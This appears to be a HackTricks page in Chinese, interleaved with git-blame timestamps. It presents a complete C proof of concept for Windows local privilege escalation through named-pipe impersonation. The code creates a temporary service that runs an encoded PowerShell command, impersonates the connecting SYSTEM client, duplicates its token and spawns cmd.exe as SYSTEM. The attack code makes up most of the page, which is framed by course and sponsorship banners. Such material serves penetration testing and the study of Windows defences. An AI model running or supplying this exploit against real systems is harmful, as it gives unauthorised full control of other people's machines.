2022-04-28 16:01:33 +00:00
< details >
2024-02-09 01:27:24 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 01:27:24 +00:00
其他支持HackTricks的方式:
2022-04-28 16:01:33 +00:00
2024-02-09 01:27:24 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-09 14:10:19 +00:00
**代码流程:**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
1. 创建一个新的管道
2024-02-09 01:27:24 +00:00
2. 创建并启动一个服务, 该服务将连接到创建的管道并写入内容。服务代码将执行编码的PS代码: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
3. 服务从管道中接收来自客户端的数据, 调用ImpersonateNamedPipeClient并等待服务完成
4. 最后, 使用从服务获取的令牌生成一个新的_cmd.exe_
2020-07-15 15:43:14 +00:00
2020-12-28 14:16:10 +00:00
{% hint style="warning" %}
2024-02-09 01:27:24 +00:00
如果权限不足,利用可能会卡住并永远不返回。
2020-12-28 14:16:10 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
```c
#include <windows.h>
#include <time.h>
#pragma comment (lib, "advapi32")
#pragma comment (lib, "kernel32")
#define PIPESRV "PiperSrv"
#define MESSAGE_SIZE 512
int ServiceGo(void) {
2023-08-03 19:12:22 +00:00
SC_HANDLE scManager;
SC_HANDLE scService;
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
if (scManager == NULL) {
return FALSE;
}
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
// create Piper service
scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
NULL, NULL, NULL, NULL, NULL);
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
if (scService == NULL) {
//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
return FALSE;
}
2020-12-28 14:14:40 +00:00
2023-08-03 19:12:22 +00:00
// launch it
StartService(scService, 0, NULL);
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
// wait a bit and then cleanup
Sleep(10000);
DeleteService(scService);
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
CloseServiceHandle(scService);
CloseServiceHandle(scManager);
2020-07-15 15:43:14 +00:00
}
int main() {
2023-08-03 19:12:22 +00:00
LPCSTR sPipeName = "\\\\.\\pipe\\piper";
HANDLE hSrvPipe;
HANDLE th;
BOOL bPipeConn;
char pPipeBuf[MESSAGE_SIZE];
DWORD dBRead = 0;
HANDLE hImpToken;
HANDLE hNewToken;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
// open pipe
hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
// create and run service
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);
// wait for the connection from the service
bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
if (bPipeConn) {
ReadFile(hSrvPipe, & pPipeBuf, MESSAGE_SIZE, & dBRead, NULL);
// impersonate the service (SYSTEM)
if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
return -1;
2020-07-15 15:43:14 +00:00
}
2023-08-03 19:12:22 +00:00
// wait for the service to cleanup
WaitForSingleObject(th, INFINITE);
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
// get a handle to impersonated token
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, & hImpToken)) {
return -2;
}
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
// create new primary token for new process
if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
TokenPrimary, & hNewToken)) {
return -4;
}
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
//Sleep(20000);
// spawn cmd.exe as full SYSTEM user
ZeroMemory(& si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(& pi, sizeof(pi));
if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,
NULL, NULL, NULL, (LPSTARTUPINFOW)& si, & pi)) {
return -5;
}
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
// revert back to original security context
RevertToSelf();
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
}
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
return 0;
}
```
< details >
2022-04-28 16:01:33 +00:00
2024-02-09 01:27:24 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 01:27:24 +00:00
其他支持HackTricks的方式:
2022-04-28 16:01:33 +00:00
2024-02-09 01:27:24 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2023-08-03 19:12:22 +00:00
< / details >